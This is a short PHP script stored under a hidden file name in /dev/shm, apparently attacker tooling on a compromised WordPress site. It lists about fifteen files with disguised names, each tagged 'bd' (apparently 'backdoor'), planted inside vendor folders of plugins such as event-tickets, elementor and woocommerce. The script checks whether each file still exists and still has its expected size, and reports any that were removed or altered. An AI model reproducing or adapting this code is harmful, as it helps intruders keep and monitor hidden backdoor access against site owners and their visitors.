File: //dev/shm/.k
<?php $r = '/home/mervecvt/public_html'; $x = ["/wp-content/plugins/event-tickets/common/vendor/vendor-prefixed/stellarwp/uplink/src/Uplink/API/V3/Auth/Auth.Url.php"=>"bd@@1303307@@922",
"/wp-content/plugins/the-events-calendar/common/vendor/vendor-prefixed/stellarwp/installer/src/Installer/Contracts/affiliate_clicks.php"=>"bd@@1303340@@1007",
"/wp-content/plugins/elementor/vendor_prefixed/twig/twig/twig/src/Node/Expression/Filter/contenttype.news.php"=>"bd@@1266733@@1026",
"/wp-content/plugins/event-tickets/common/src/Common/Event_Automator/Zapier/REST/V1/Documentation/Swagger.Documentation.php"=>"bd@@1266224@@986",
"/wp-content/plugins/one-click-demo-import/vendor/phpunit/phpunit/src/Framework/Constraint/Boolean/config_seo.php"=>"bd@@1275197@@1056",
"/wp-content/plugins/event-tickets/common/vendor/vendor-prefixed/stellarwp/telemetry/src/Telemetry/Admin/Admin.Subscriber.php"=>"bd@@1303374@@945",
"/wp-content/plugins/elementor/vendor_prefixed/dependency-injection/php-di/phpdoc-reader/src/PhpDocReader/PhpParser/userbids.php"=>"bd@@1275235@@957",
"/wp-content/plugins/the-events-calendar/common/vendor/vendor-prefixed/stellarwp/admin-notices/src/ValueObjects/categories_0222.php"=>"bd@@1267050@@854",
"/wp-content/plugins/event-tickets/src/views/v2/week/mobile-events/day/event/menu_tables.inc.php"=>"bd@@1303414@@962",
"/wp-content/plugins/woocommerce/packages/email-editor/src/Integrations/Core/Renderer/Blocks/class.list.php"=>"bd@@1275277@@957",
"/wp-content/plugins/the-events-calendar/common/vendor/vendor-prefixed/stellarwp/uplink/src/Uplink/API/Validation.php"=>"bd@@1265806@@1023",
"/wp-content/plugins/the-events-calendar/common/vendor/vendor-prefixed/stellarwp/telemetry/src/Telemetry/Exit_Interview/Exit.Interview.Subscriber.php"=>"bd@@1265565@@924",
"/wp-content/plugins/the-events-calendar/common/vendor/vendor-prefixed/stellarwp/uplink/src/Uplink/Storage/cma_m_myaccount.php"=>"bd@@1275092@@872",
"/wp-content/plugins/the-events-calendar/common/vendor/vendor-prefixed/stellarwp/uplink/src/Uplink/API/V3/Contracts/Client.V3.php"=>"bd@@1303263@@994",
"/wp-content/plugins/event-tickets/common/vendor/vendor-prefixed/stellarwp/uplink/src/Uplink/Site/mp3.php"=>"bd@@1275140@@886"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');